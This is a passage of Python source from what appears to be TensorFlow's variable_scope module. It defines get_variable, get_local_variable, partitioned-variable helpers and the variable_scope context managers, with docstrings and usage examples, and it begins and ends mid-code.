return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, custom_getter=custom_getter,
constraint=constraint)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets an existing variable with this name or create a new one."""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=self.reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export("get_variable_scope")
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
  print(container.variables())  # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export("get_variable")
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None):
return get_variable_scope().get_variable(
_get_default_variable_store(), name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, custom_getter=custom_getter,
constraint=constraint)
get_variable_or_local_docstring = (
"""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
@{$variables$Variable Scope How To}
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
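As an illustrative sketch (the scope and variable names below are arbitrary,
and the lambda is not a library-provided partitioner), a fixed partitioner
that splits the first axis into four shards could be used as follows:

```python
partitioner = lambda shape, dtype: [4] + [1] * (len(shape) - 1)
with tf.variable_scope("embeddings", partitioner=partitioner):
  w = tf.get_variable("w", shape=[20, 10])  # Returns a PartitionedVariable.
```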
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
@{tf.GraphKeys.REGULARIZATION_LOSSES} and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export("get_local_variable")
def get_local_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, trainable=False, collections=collections,
caching_device=caching_device, partitioner=partitioner,
validate_shape=validate_shape, use_resource=use_resource,
custom_getter=custom_getter, constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
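  As an illustrative sketch (this partitioner is hypothetical, not part of the
  library), a callable requesting 3 shards along dimension 1 of a
  two-dimensional variable could look like:

  ```python
  def three_way_partitioner(shape, dtype):
    del dtype  # Unused in this sketch.
    return [1, 3] if len(shape) == 2 else [1] * len(shape)
  ```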
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(), name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
        If True, experimental ResourceVariables will be created instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export("variable_scope") # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
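  For example (a minimal sketch of the uniquifying behavior, assuming no scope
  named "block" has been used yet in the current thread):

  ```python
  with tf.variable_scope(None, default_name="block") as s1:
    pass  # s1.name == "block"
  with tf.variable_scope(None, default_name="block") as s2:
    pass  # s2.name == "block_1", uniquified by appending _N
  ```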
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the @{$variables$Variable Scope How To}, here we present only a few basic
examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
  ops such as multiply. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
        `None`, this name will be uniquified. If `name_or_scope` is provided,
        `default_name` is ignored, so it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
this argument is always forced to be tf.AUTO_REUSE.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't touch name scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
    self._cached_pure_variable_scope = None
    self._current_name_scope = None
    # Initialized here so the error path in __enter__ can safely test it even
    # when no graph context manager was created (e.g. in eager mode).
    self._graph_context_manager = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if self._graph_context_manager is not None:
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
